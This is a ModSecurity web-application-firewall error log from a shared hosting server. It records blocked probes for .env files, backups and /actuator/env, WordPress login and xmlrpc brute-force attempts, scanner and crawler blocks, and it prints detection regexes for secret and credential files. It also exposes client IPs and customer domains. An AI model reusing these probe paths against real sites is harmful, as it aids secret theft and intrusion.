[Tue May 26 17:15:46.652294 2026] [security2:error] [pid 869189:tid 869428] [client 207.241.173.124:42508] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6tB5TZSn88J_orrmowAAAGw"]
[Tue May 26 17:15:46.707580 2026] [security2:error] [pid 869189:tid 869401] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH6tB5TZSn88J_orrmlgAAAFE"]
[Tue May 26 17:15:46.749745 2026] [security2:error] [pid 869189:tid 869372] [client 207.241.173.124:42428] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahWH6tB5TZSn88J_orrmsgAAADQ"]
[Tue May 26 17:15:47.031864 2026] [security2:error] [pid 869189:tid 869382] [client 152.59.41.98:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWH69B5TZSn88J_orrmyQAAAD4"], referer: https://www.ucdc.co.in/
[Tue May 26 17:15:47.035275 2026] [autoindex:error] [pid 869189:tid 869337] [client 152.59.41.98:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:15:47.484888 2026] [security2:error] [pid 869189:tid 869420] [client 203.194.101.7:54234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH69B5TZSn88J_orrm1gAAAGQ"]
[Tue May 26 17:15:47.485047 2026] [security2:error] [pid 869189:tid 869420] [client 203.194.101.7:54234] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH69B5TZSn88J_orrm1gAAAGQ"]
[Tue May 26 17:15:48.867460 2026] [security2:error] [pid 869189:tid 869405] [client 216.213.24.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWH7NB5TZSn88J_orrnCgAAAFU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1442025&moderation-hash=83ac85537f64682b3f099fc49c85db9d
[Tue May 26 17:15:49.010653 2026] [security2:error] [pid 869189:tid 869391] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH7NB5TZSn88J_orrnBAAAAEc"]
[Tue May 26 17:15:50.280242 2026] [security2:error] [pid 869189:tid 869437] [client 5.255.104.83:41182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "biofresco.it"] [uri "/.env"] [unique_id "ahWH7tB5TZSn88J_orrnRAAAAHU"]
[Tue May 26 17:15:50.437818 2026] [security2:error] [pid 869189:tid 869336] [client 5.255.104.83:41198] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "biofresco.it"] [uri "/.env.bak"] [unique_id "ahWH7tB5TZSn88J_orrnTwAAABA"]
[Tue May 26 17:15:50.438815 2026] [security2:error] [pid 869189:tid 869444] [client 5.255.104.83:41182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "biofresco.it"] [uri "/.env.backup"] [unique_id "ahWH7tB5TZSn88J_orrnUAAAAHw"]
[Tue May 26 17:15:50.784112 2026] [security2:error] [pid 869189:tid 869335] [client 5.255.104.83:41178] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "biofresco.it"] [uri "/actuator/env"] [unique_id "ahWH7tB5TZSn88J_orrnZwAAAA8"]
[Tue May 26 17:15:50.784198 2026] [security2:error] [pid 869189:tid 869335] [client 5.255.104.83:41178] ModSecurity: Warning. Matched phrase "CCBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "biofresco.it"] [uri "/actuator/env"] [unique_id "ahWH7tB5TZSn88J_orrnZwAAAA8"]
[Tue May 26 17:15:50.858519 2026] [security2:error] [pid 869189:tid 869416] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH7tB5TZSn88J_orrnUgAAAGA"]
[Tue May 26 17:15:51.363384 2026] [security2:error] [pid 869189:tid 869194] [remote 37.59.204.149:45474] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "strapptech.com"] [uri "/robots.txt"] [unique_id "ahWH79B5TZSn88J_orrnjAAAdQM"]
[Tue May 26 17:15:51.363669 2026] [security2:error] [pid 869189:tid 869437] [client 37.59.204.149:45474] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "strapptech.com"] [uri "/robots.txt"] [unique_id "ahWH79B5TZSn88J_orrnjAAAdQM"]
[Tue May 26 17:15:52.207343 2026] [security2:error] [pid 869189:tid 869199] [remote 178.104.164.71:52902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWH8NB5TZSn88J_orrnpQAAawg"]
[Tue May 26 17:15:53.377823 2026] [security2:error] [pid 869189:tid 869202] [remote 142.44.225.165:62988] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "strapptech.com"] [uri "/"] [unique_id "ahWH8dB5TZSn88J_orrnxwAAAgs"]
[Tue May 26 17:15:53.377996 2026] [security2:error] [pid 869189:tid 869322] [client 142.44.225.165:62988] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "strapptech.com"] [uri "/"] [unique_id "ahWH8dB5TZSn88J_orrnxwAAAgs"]
[Tue May 26 17:15:53.754901 2026] [security2:error] [pid 869189:tid 869350] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH8dB5TZSn88J_orrnxgAAAB4"]
[Tue May 26 17:15:54.042062 2026] [security2:error] [pid 869189:tid 869383] [client 51.68.236.68:28307] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWH8tB5TZSn88J_orrn1wAAAD8"]
[Tue May 26 17:15:54.042195 2026] [security2:error] [pid 869189:tid 869383] [client 51.68.236.68:28307] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWH8tB5TZSn88J_orrn1wAAAD8"]
[Tue May 26 17:15:56.233668 2026] [security2:error] [pid 869189:tid 869331] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH89B5TZSn88J_orroDwAAAAs"]
[Tue May 26 17:15:58.140416 2026] [security2:error] [pid 869189:tid 869419] [client 170.23.16.166:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWH9dB5TZSn88J_orroOAAAAGM"]
[Tue May 26 17:15:58.144994 2026] [security2:error] [pid 869189:tid 869412] [client 203.194.101.7:54586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH9tB5TZSn88J_orroTAAAAFw"]
[Tue May 26 17:15:58.145132 2026] [security2:error] [pid 869189:tid 869412] [client 203.194.101.7:54586] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWH9tB5TZSn88J_orroTAAAAFw"]
[Tue May 26 17:15:58.360172 2026] [security2:error] [pid 869189:tid 869341] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH9dB5TZSn88J_orroRwAAABU"]
[Tue May 26 17:15:58.536960 2026] [security2:error] [pid 869189:tid 869323] [client 98.88.179.76:25780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "deeigo.com"] [uri "/public/index.php"] [unique_id "ahWH9dB5TZSn88J_orroQwAAAAM"]
[Tue May 26 17:15:59.906634 2026] [security2:error] [pid 869189:tid 869226] [remote 103.95.119.103:36302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWH99B5TZSn88J_orrocgAAQSM"]
[Tue May 26 17:16:00.227911 2026] [security2:error] [pid 869189:tid 869402] [client 198.46.203.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWH-NB5TZSn88J_orrofwAAAFI"], referer: https://www.anujtradingco.com/
[Tue May 26 17:16:00.450773 2026] [security2:error] [pid 869189:tid 869364] [client 95.81.90.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH-NB5TZSn88J_orrofAAAACw"]
[Tue May 26 17:16:00.720952 2026] [security2:error] [pid 869189:tid 869409] [client 198.46.203.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWH-NB5TZSn88J_orrojAAAAFk"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1513718&moderation-hash=be3232afec1c81fc37d209726442fe49
[Tue May 26 17:16:00.751810 2026] [security2:error] [pid 869189:tid 869323] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH-NB5TZSn88J_orroggAAAAM"]
[Tue May 26 17:16:01.161350 2026] [security2:error] [pid 869189:tid 869212] [remote 103.95.119.103:39394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWH-dB5TZSn88J_orrooAAAORU"]
[Tue May 26 17:16:02.369222 2026] [security2:error] [pid 869189:tid 869388] [client 198.46.203.13:39851] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWH-dB5TZSn88J_orrosgAAAEQ"], referer: https://anujtradingco.com
[Tue May 26 17:16:02.894412 2026] [security2:error] [pid 869189:tid 869366] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH-tB5TZSn88J_orrowQAAAC4"]
[Tue May 26 17:16:05.271639 2026] [security2:error] [pid 869189:tid 869370] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH_NB5TZSn88J_orrpDgAAADI"]
[Tue May 26 17:16:06.418990 2026] [security2:error] [pid 869189:tid 869225] [remote 74.7.241.58:42770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWH_tB5TZSn88J_orrpOQAAXiI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:16:07.053322 2026] [security2:error] [pid 869189:tid 869333] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWH_tB5TZSn88J_orrpQgAAAA0"]
[Tue May 26 17:16:07.203785 2026] [security2:error] [pid 869189:tid 869358] [client 85.208.96.202:44494] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/rec/list/"] [unique_id "ahWH_9B5TZSn88J_orrpTwAAACY"]
[Tue May 26 17:16:07.204011 2026] [security2:error] [pid 869189:tid 869358] [client 85.208.96.202:44494] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/rec/list/"] [unique_id "ahWH_9B5TZSn88J_orrpTwAAACY"]
[Tue May 26 17:16:07.380852 2026] [security2:error] [pid 869189:tid 869278] [remote 160.250.186.220:59058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWH_9B5TZSn88J_orrpSwAAGVc"]
[Tue May 26 17:16:08.483581 2026] [security2:error] [pid 869189:tid 869420] [client 203.194.101.7:54934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIANB5TZSn88J_orrpcwAAAGQ"]
[Tue May 26 17:16:08.483746 2026] [security2:error] [pid 869189:tid 869420] [client 203.194.101.7:54934] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIANB5TZSn88J_orrpcwAAAGQ"]
[Tue May 26 17:16:09.357419 2026] [security2:error] [pid 869189:tid 869409] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIANB5TZSn88J_orrpigAAAFk"]
[Tue May 26 17:16:09.694798 2026] [security2:error] [pid 869189:tid 869419] [client 91.84.124.42:56914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.124.84.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWIAdB5TZSn88J_orrpmAAAAGM"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 17:16:09.694980 2026] [security2:error] [pid 869189:tid 869419] [client 91.84.124.42:56914] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "agsnails.com"] [uri "/wp-comments-post.php"] [unique_id "ahWIAdB5TZSn88J_orrpmAAAAGM"], referer: https://agsnails.com/fresh-snails/
[Tue May 26 17:16:12.239468 2026] [security2:error] [pid 869189:tid 869283] [remote 160.250.186.220:37176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIBNB5TZSn88J_orrp6gAAGVw"]
[Tue May 26 17:16:12.323617 2026] [security2:error] [pid 869189:tid 869337] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIA9B5TZSn88J_orrp5QAAABE"]
[Tue May 26 17:16:14.036167 2026] [security2:error] [pid 869189:tid 869355] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIBdB5TZSn88J_orrqFQAAACM"]
[Tue May 26 17:16:16.997063 2026] [security2:error] [pid 869189:tid 869444] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWICNB5TZSn88J_orrqZAAAAHw"]
[Tue May 26 17:16:18.860744 2026] [security2:error] [pid 869189:tid 869404] [client 203.194.101.7:55490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWICtB5TZSn88J_orrqlgAAAFQ"]
[Tue May 26 17:16:18.860861 2026] [security2:error] [pid 869189:tid 869404] [client 203.194.101.7:55490] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWICtB5TZSn88J_orrqlgAAAFQ"]
[Tue May 26 17:16:19.343451 2026] [security2:error] [pid 869189:tid 869376] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWICtB5TZSn88J_orrqmQAAADg"]
[Tue May 26 17:16:21.024633 2026] [security2:error] [pid 869189:tid 869403] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIDNB5TZSn88J_orrq1gAAAFM"]
[Tue May 26 17:16:23.415403 2026] [security2:error] [pid 869189:tid 869413] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIDtB5TZSn88J_orrrFQAAAF0"]
[Tue May 26 17:16:24.540943 2026] [security2:error] [pid 869189:tid 869197] [remote 5.78.119.122:44164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIENB5TZSn88J_orrrNAAABwY"]
[Tue May 26 17:16:25.188725 2026] [security2:error] [pid 869189:tid 869348] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIEdB5TZSn88J_orrrUgAAABw"], referer: https://www.anujtradingco.com/
[Tue May 26 17:16:25.521378 2026] [security2:error] [pid 869189:tid 869322] [client 69.48.202.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIEdB5TZSn88J_orrrYAAAAAI"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1460507&moderation-hash=383c338c12fc424a1691f21077c966b7
[Tue May 26 17:16:25.693036 2026] [security2:error] [pid 869189:tid 869419] [client 223.235.98.214:3084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIEdB5TZSn88J_orrrXwAAAGM"]
[Tue May 26 17:16:25.693220 2026] [security2:error] [pid 869189:tid 869419] [client 223.235.98.214:3084] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIEdB5TZSn88J_orrrXwAAAGM"]
